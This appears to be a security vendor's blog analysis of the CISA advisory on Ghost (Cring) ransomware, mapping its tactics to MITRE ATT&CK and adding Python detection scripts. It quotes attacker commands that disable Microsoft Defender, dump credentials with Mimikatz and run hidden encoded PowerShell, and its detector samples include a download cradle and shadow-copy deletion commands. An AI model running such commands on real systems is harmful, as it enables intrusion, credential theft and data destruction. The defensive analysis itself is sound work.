Ghost (Cring) Ransomware Analysis, Simulation, and Mitigation - CISA Alert AA25-050A


On February 19, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Ghost (Cring) ransomware [1]. Ghost ransomware emerged in early 2021 and gained notoriety by compromising vulnerable internet-facing services using known vulnerabilities. According to CISA, Ghost threat actors are financially motivated and have compromised organizations across more than 70 countries.

In this blog post, we explain the Tactics, Techniques, and Procedures (TTPs) used by Ghost (Cring) ransomware and how organizations can defend themselves against Ghost ransomware attacks.


Ghost (Cring) Ransomware

Ghost (Cring) ransomware first appeared in early 2021 as a financially motivated operation. Although the group is based in China, the threat actors indiscriminately target any organization with vulnerable public-facing services or assets. To date, Ghost ransomware has impacted organizations across more than 70 countries, including organizations in China.

Ghost ransomware operators are known to rotate their ransomware payloads, ransom notes, and the file extensions appended to encrypted files. Because of these changes, the same activity has been tracked under several names over time, including Cring, Crypt3r, Hello, HsHarada, Phantom, Rapture, Strike, and Wickrme.

To gain initial access, Ghost threat actors exploit known, critical vulnerabilities in internet-facing assets such as Fortinet FortiOS appliances and servers running Adobe ColdFusion, Microsoft SharePoint, and Microsoft Exchange. After initial access, they deploy web shells and Cobalt Strike Beacons to establish persistence. They then use Mimikatz to dump credentials, or exploit known privilege escalation vulnerabilities to elevate their privileges, and move laterally to other systems in the target network. Before encryption, Ghost threat actors exfiltrate sensitive information and delete volume shadow copies. Together, these actions prevent victims from recovering their data and pressure them into paying for the decryption key.

Ghost (Cring) Ransomware Analysis and MITRE ATT&CK TTPs

Initial Access

T1190 Exploit Public Facing Applications

Ghost threat actors exploit the known, critical vulnerabilities listed below to gain initial access to target organizations. Patches exist for all of them, and the oldest date from 2009 and 2010, so their presence on an internet-facing host indicates long-unpatched or end-of-life software. Organizations are advised to patch vulnerable assets as soon as possible.

Affected Product                  Vulnerability     CVSS Score
Fortinet FortiOS and FortiProxy   CVE-2018-13379    9.8 (Critical)
Adobe ColdFusion                  CVE-2010-2861     9.8 (Critical)
Adobe ColdFusion                  CVE-2009-3960     6.5 (Medium)
Microsoft SharePoint              CVE-2019-0604     9.8 (Critical)
Microsoft Exchange (ProxyShell)   CVE-2021-34473    9.1 (Critical)
Microsoft Exchange (ProxyShell)   CVE-2021-34523    9.0 (Critical)
Microsoft Exchange (ProxyShell)   CVE-2021-31207    6.6 (Medium)

Execution & Lateral Movement

T1047 Windows Management Instrumentation & T1059.001 Command and Scripting Interpreter: PowerShell

Adversaries use Windows Management Instrumentation (WMI) to run encoded PowerShell commands on remote systems and deploy Cobalt Strike Beacon on them.

//Encoded PowerShell command

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcAL…
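The encoded command quoted above is truncated, so the following added example (written for this post; it is not code from the CISA advisory or from the Picus platform) shows how a detection would handle such events: it decodes the Base64 payload of -EncodedCommand, which PowerShell encodes as UTF-16LE rather than ASCII, and scores process-creation events where a hidden-window, encoded PowerShell is spawned by the WMI provider host. The sample events, file paths, the download-cradle script and the WMI_PARENTS set are constructed assumptions; the -e, -ec and -enc abbreviations are the ones PowerShell itself accepts for -EncodedCommand.

```python
import base64
import re

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -enc, ...),
# followed by the Base64 blob. "-ep" (ExecutionPolicy) does not match because the
# flag name must be followed by whitespace.
_ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]+)")

# Parent processes typical of WMI-driven remote execution (assumption: tune per environment)
WMI_PARENTS = {"wmiprvse.exe"}


def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand, or None if there is none.

    PowerShell Base64-encodes the UTF-16LE bytes of the script, so the blob
    must be decoded as UTF-16LE, not as ASCII/UTF-8.
    """
    m = _ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script):
    """Inverse of the above; used here only to build the constructed sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def classify(event):
    """Score one process-creation event. Returns (severity, reasons, decoded_script)."""
    cmd = event["CommandLine"]
    child = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    reasons, decoded = [], None
    if child in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded command")
        if re.search(r"(?i)\s-w(?:indowstyle)?\s+hidden\b", cmd):
            reasons.append("hidden window")
        if re.search(r"(?i)\s-nop(?:rofile)?\b", cmd):
            reasons.append("profile suppressed")
        if parent in WMI_PARENTS:
            reasons.append("spawned by WMI provider host")
        if decoded and re.search(r"(?i)Net\.WebClient|DownloadString|Invoke-Expression|\bIEX\b", decoded):
            reasons.append("download cradle in decoded script")
    if "spawned by WMI provider host" in reasons and decoded is not None:
        severity = "high"
    elif reasons:
        severity = "medium"
    else:
        severity = "none"
    return severity, reasons, decoded


# Constructed sample events in the shape of Sysmon Event ID 1 / Windows 4688 fields
SAMPLE_EVENTS = [
    {   # modelled on the advisory's command shape; the script and host are invented
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": "powershell -nop -w hidden -encodedcommand "
        + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"),
    },
    {   # benign: an admin running an encoded one-liner from an interactive session
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell -EncodedCommand "
        + encode_command("Get-Service | Where-Object Status -eq 'Running'"),
    },
    {   # unrelated process creation
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "notepad.exe",
    },
]


def triage(events=SAMPLE_EVENTS):
    """Classify every event; returns a list of (severity, reasons, decoded_script)."""
    return [classify(e) for e in events]


if __name__ == "__main__":
    for severity, reasons, decoded in triage():
        print(severity, reasons, decoded)
```

Encoded PowerShell on its own is not malicious (administrators and management agents use it), which is why the score combines the encoding with the parent process, the window and profile switches, and the content of the decoded script rather than alerting on -EncodedCommand alone.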

Persistence 

T1136 Create Account & T1098 Account Manipulation

Adversaries create new accounts or change the passwords of existing accounts to establish persistent access to the compromised network. 

T1505.003 Web Shell

Ghost threat actors deploy a variant of the Chunk-Proxy web shell. It allows adversaries to execute commands remotely and maintain persistence on the compromised system.

Privilege Escalation

T1068 Exploitation for Privilege Escalation

Adversaries use open-source tools and known vulnerabilities to elevate their privileges.

  • SharpZeroLogon: a C# implementation of the ZeroLogon (CVE-2020-1472) exploit, which targets a cryptographic flaw in the Netlogon Remote Protocol (MS-NRPC). ZeroLogon lets an unauthenticated attacker on the network reset the machine account password of an unpatched domain controller and, from there, obtain domain administrator privileges.

  • SharpGPPPass: a C# tool that extracts Group Policy Preferences (GPP) passwords from SYSVOL shares in Active Directory environments. It automates locating and decrypting the credentials stored in GPP XML files (the cpassword attribute), which administrators historically used to deploy local user accounts, service account credentials, and other settings across Windows systems. The AES key protecting these values was published by Microsoft, so any domain user who can read SYSVOL can recover the plaintext.

  • BadPotato: a local privilege escalation tool for accounts that hold SeImpersonatePrivilege, typically service accounts such as IIS application pool identities. It coerces the Print Spooler service into connecting to a named pipe under the attacker's control and impersonates the resulting SYSTEM token to obtain a SYSTEM shell.

  • GodPotato: another member of the "Potato" family (RottenPotato, JuicyPotato, BadPotato). It abuses the way the RPCSS service (DCOM) connects back to a named pipe during object activation, again impersonating the SYSTEM token it receives. Unlike the earlier variants, it does not rely on local NTLM relay and works on current Windows versions, but it still requires SeImpersonatePrivilege, which is why these tools are effective once a web shell is running under a service account.

Defense Evasion

T1562.001 Impair Defenses: Disable or Modify Tools

Ghost operators disable antivirus products, in particular Microsoft Defender, so that their commands and payloads run undetected. The following PowerShell command, which requires administrative privileges, turns off real-time, behavior, script, and download (IOAV) scanning, disables Controlled Folder Access, and stops cloud-delivered protection (MAPS) and sample submission:

Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
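As an added example (not part of the advisory or of the Picus platform), the following Python parses a Set-MpPreference invocation from a PowerShell script-block or process-creation log and reports exactly which settings weaken Defender, so that the command above is caught while a benign call that re-enables protection or only changes a scan schedule is not. It mirrors PowerShell's acceptance of unambiguous parameter prefixes (for example -DisableRealtime for -DisableRealtimeMonitoring) and of bare switches meaning $true. The WEAKENING map and the benign sample commands are assumptions made for this example; the numeric enum codes follow the Set-MpPreference documentation.

```python
import re

# Set-MpPreference parameters and the values that weaken Defender when applied.
# Booleans: 1/$true. Enums, by their numeric codes: EnableControlledFolderAccess
# Disabled=0, MAPSReporting Disabled=0, SubmitSamplesConsent NeverSend=2.
WEAKENING = {
    "disablerealtimemonitoring": {"1", "$true", "true"},
    "disableintrusionpreventionsystem": {"1", "$true", "true"},
    "disablebehaviormonitoring": {"1", "$true", "true"},
    "disablescriptscanning": {"1", "$true", "true"},
    "disableioavprotection": {"1", "$true", "true"},
    "enablecontrolledfolderaccess": {"disabled", "0"},
    "mapsreporting": {"disabled", "0"},
    "submitsamplesconsent": {"neversend", "2"},
}

_SET_MPPREF = re.compile(r"(?i)\bSet-MpPreference\b")


def _resolve(name):
    """PowerShell accepts any unambiguous prefix of a parameter name; mirror that."""
    hits = [k for k in WEAKENING if k.startswith(name)]
    return hits[0] if len(hits) == 1 else None


def defender_tampering(cmdline):
    """Return [(parameter, value), ...] for every Defender-weakening switch in a Set-MpPreference call.

    An empty list means the command is either not Set-MpPreference or only changes
    settings that do not reduce protection (exclusions aside; those warrant their own rule).
    """
    if not _SET_MPPREF.search(cmdline):
        return []
    tokens = cmdline.split()
    findings, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        if not (tok.startswith("-") and len(tok) > 1):
            i += 1
            continue
        has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("-")
        value = tokens[i + 1] if has_value else "$true"   # a bare switch means $true
        param = _resolve(tok[1:].lower())
        if param and value.strip("'\"").lower() in WEAKENING[param]:
            findings.append((param, value))
        i += 2 if has_value else 1
    return findings


# The command quoted in the advisory, plus two constructed benign invocations
ADVISORY_CMD = ("Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 "
                "-DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 "
                "-EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend")
BENIGN_CMDS = [
    "Set-MpPreference -DisableRealtimeMonitoring 0 -ScanScheduleQuickScanTime 02:00",
    "Get-MpPreference | Select-Object DisableRealtimeMonitoring",
]

if __name__ == "__main__":
    print(defender_tampering(ADVISORY_CMD))
    for c in BENIGN_CMDS:
        print(defender_tampering(c))
```

Run against the advisory's command, the function returns all eight weakened settings; the two benign commands return nothing. In practice the same logic should be applied to Defender's own operational log (the event that records a protection feature being disabled), since an attacker can reach the same configuration through registry edits or Group Policy without ever invoking Set-MpPreference.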

Credential Access

T1003 OS Credential Dumping

Ghost threat actors use Mimikatz on Windows systems to dump credentials. 

mimikatz "privilege::debug" "sekurlsa::logonpasswords"
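The sekurlsa::logonpasswords module works by opening lsass.exe and reading its memory, which Sysmon records as Event ID 10 (ProcessAccess). The following added example (written for this post, not taken from the advisory or from Picus) parses the message body of such events and alerts when a non-allowlisted process obtains PROCESS_VM_READ or write/inject rights on LSASS. The sample messages, the source-image paths and the ALLOWLIST are constructed assumptions that must be tuned per environment; the 0x1010 mask in the first sample is one commonly associated with Mimikatz's sekurlsa module in published Sysmon detections.

```python
# Process access-mask bits relevant to reading or injecting into LSASS
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Images that legitimately open LSASS memory (assumption; tune per environment)
ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


def parse_sysmon_message(text):
    """Turn the 'Field: value' body of a Sysmon event message into a dict."""
    fields = {}
    for line in text.strip().splitlines()[1:]:      # line 0 is the event title
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    return fields


def lsass_access_reason(fields):
    """Return why this Event ID 10 looks like credential dumping, or None if it does not."""
    if not fields.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    source = fields.get("SourceImage", "").lower()
    if source in ALLOWLIST:
        return None
    access = int(fields.get("GrantedAccess", "0x0"), 16)
    flags = []
    if access & PROCESS_VM_READ:
        flags.append("PROCESS_VM_READ")
    if access & (PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD):
        flags.append("write/inject rights")
    if not flags:
        return None            # e.g. QUERY_LIMITED_INFORMATION alone cannot read credentials
    if "UNKNOWN" in fields.get("CallTrace", ""):
        flags.append("call stack through unbacked memory")   # typical of reflectively loaded tools
    return f"{source} opened lsass.exe with {hex(access)}: {', '.join(flags)}"


# Constructed sample messages in the layout Sysmon writes for Event ID 10
SAMPLE_MESSAGES = [
    r"""Process accessed:
RuleName: -
UtcTime: 2025-02-20 10:15:32.123
SourceImage: C:\Users\Public\m.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1010
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4a4|UNKNOWN(000001E2C4A3B120)""",
    r"""Process accessed:
RuleName: -
UtcTime: 2025-02-20 10:15:33.001
SourceImage: C:\Program Files\Windows Defender\MsMpEng.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Windows\System32\KERNELBASE.dll+2a1d4""",
    r"""Process accessed:
RuleName: -
UtcTime: 2025-02-20 10:15:34.500
SourceImage: C:\Windows\system32\svchost.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1000
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Windows\System32\KERNELBASE.dll+2a1d4""",
]


def scan(messages=SAMPLE_MESSAGES):
    """Return the alert reasons for every message that looks like LSASS dumping."""
    return [r for r in (lsass_access_reason(parse_sysmon_message(m)) for m in messages) if r]


if __name__ == "__main__":
    for alert in scan():
        print(alert)
```

Checking the access-mask bits rather than a fixed list of masks (0x1010, 0x1410, 0x1FFFFF and so on) keeps the rule robust when a tool requests a slightly different combination of rights; the allowlist, not the mask, is where the false-positive tuning happens. Enabling LSA protection (RunAsPPL) or Credential Guard prevents this access path outright and should accompany the detection.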

Discovery

Adversaries use the following tools and commands to discover remote systems, running processes, network shares, and domain accounts from compromised systems.

  • T1018 Remote System Discovery: Adversaries use Ladon 911 and SharpNBTScan to discover remote systems.

  • T1057 Process Discovery: Adversaries use the ps command to list running processes.

  • T1135 Network Share Discovery: Adversaries use SharpShares to discover network shares.

  • T1087.002 Domain Account Discovery: Adversaries use the following command to list domain administrator accounts.

net group "Domain Admins" /domain

Command and Control (C2)

T1071.001 Web Protocols

Adversaries use Cobalt Strike Beacon and Cobalt Strike Team Servers to communicate with compromised systems over HTTP and HTTPS.

T1105 Ingress Tool Transfer

Ghost operators use their C2 servers to transfer malicious tools and ransomware payloads to the victim's network.

T1132.001 Data Encoding: Standard Encoding

Ghost operators Base64-encode the PowerShell commands they run during lateral movement so that the command lines do not reveal their content at a glance.

T1573 Encrypted Channel

Ghost operators communicate through encrypted email services, so the content of their ransom communications cannot be inspected in transit.

Exfiltration

T1041 Exfiltration Over C2 Channel

Adversaries use the deployed webshells and Cobalt Strike beacons to exfiltrate data from the compromised systems.

T1567.002 Exfiltration to Cloud Storage

Adversaries use cloud storage providers such as mega.nz to exfiltrate their victims' sensitive data for double extortion.

Impact

T1486 Data Encrypted for Impact 

Ghost operators use various ransomware payloads such as Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe to encrypt their victims' files and directories. Encrypted files receive a new file extension, which the operators change from campaign to campaign.

T1490 Inhibit System Recovery 

Adversaries delete volume shadow copies so that victims cannot restore their encrypted files from local snapshots.
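The advisory states only that shadow copies are deleted, not which command Ghost uses. As an added example (not from the advisory or from Picus), the following Python applies a small rule set covering the recovery-inhibition commands commonly seen across ransomware families to process-creation command lines, distinguishing destructive calls from read-only ones such as vssadmin list shadows. The pattern list and the sample command lines are constructed; treat the list as generic ransomware tradecraft rather than as confirmed Ghost behaviour.

```python
import re

# Recovery-inhibition command patterns seen across ransomware families (assumption:
# the advisory does not document which of these Ghost runs).
RECOVERY_INHIBITION = [
    (re.compile(r"(?i)\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b"),
     "vssadmin delete shadows"),
    (re.compile(r"(?i)\bvssadmin(?:\.exe)?\b.*\bresize\s+shadowstorage\b.*/maxsize="),
     "vssadmin shrink shadow storage"),
    (re.compile(r"(?i)\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b"),
     "wmic shadowcopy delete"),
    (re.compile(r"(?i)win32_shadowcopy\b.*(?:remove-wmiobject|remove-ciminstance|\.delete\(\))"),
     "PowerShell Win32_ShadowCopy removal"),
    (re.compile(r"(?i)\bbcdedit(?:\.exe)?\b.*\b(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b"),
     "bcdedit disables Windows recovery"),
    (re.compile(r"(?i)\bwbadmin(?:\.exe)?\b.*\bdelete\s+(?:catalog|systemstatebackup|backup)\b"),
     "wbadmin deletes backups"),
]


def recovery_inhibition(cmdline):
    """Return the labels of every recovery-inhibition pattern the command line matches."""
    return [label for pattern, label in RECOVERY_INHIBITION if pattern.search(cmdline)]


def scan(events):
    """events: iterable of (image, cmdline). Returns [(image, cmdline, labels)] for hits only."""
    hits = []
    for image, cmdline in events:
        labels = recovery_inhibition(cmdline)
        if labels:
            hits.append((image, cmdline, labels))
    return hits


# Constructed process-creation samples; none are quoted from the advisory
SAMPLE_EVENTS = [
    ("cmd.exe", "vssadmin.exe delete shadows /all /quiet"),
    ("cmd.exe", "vssadmin list shadows"),
    ("powershell.exe", "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"),
    ("cmd.exe", "bcdedit /set {default} recoveryenabled No"),
    ("cmd.exe", "wmic shadowcopy delete"),
    ("backup.exe", "wbadmin start backup -backupTarget:E: -include:C:"),
]

if __name__ == "__main__":
    for image, cmdline, labels in scan(SAMPLE_EVENTS):
        print(f"{image}: {cmdline} -> {labels}")
```

Because these commands run seconds before encryption starts, a hit should be treated as an active-incident signal rather than a ticket; blocking vssadmin and wmic shadow-copy deletion for non-backup accounts through application control is a cheap preventive complement.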

How Picus Helps Simulate Ghost (Cring) Ransomware Attacks

We also strongly suggest simulating Ghost (Cring) ransomware attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as RansomHub and BlackCat (ALPHV), within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Ghost (Cring) ransomware:

Threat ID   Threat Name                           Attack Module
39164       Ghost (Cring) Threat Group Campaign   Windows Endpoint
73928       Cring Ransomware Download Threat      Network Infiltration
43444       Cring Ransomware Email Threat         Email Infiltration (Phishing)

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Ghost (Cring) ransomware and other ransomware attacks in preventive security controls. Currently, Picus Labs has validated the following signatures for Ghost (Cring) ransomware:

Security Control   Signature ID   Signature Name
Check Point NGFW   0CF4A1229      Trojan.Win32.Cring.TC.5200DvMX
Cisco FirePower    -              Win.Ransomware.Bulz::in03.talos
Forcepoint NGFW    -              File_Malware-Blocked
Fortigate AV       8279374        MSIL/Filecoder.AEJ!tr.ransom
Palo Alto          407112639      trojan/Win32 EXE.filecoder.aiy
Trellix            0x4840c900     MALWARE: Malicious File Detected by GTI

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] "#StopRansomware: Ghost (Cring) Ransomware," Cybersecurity and Infrastructure Security Agency (CISA). Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a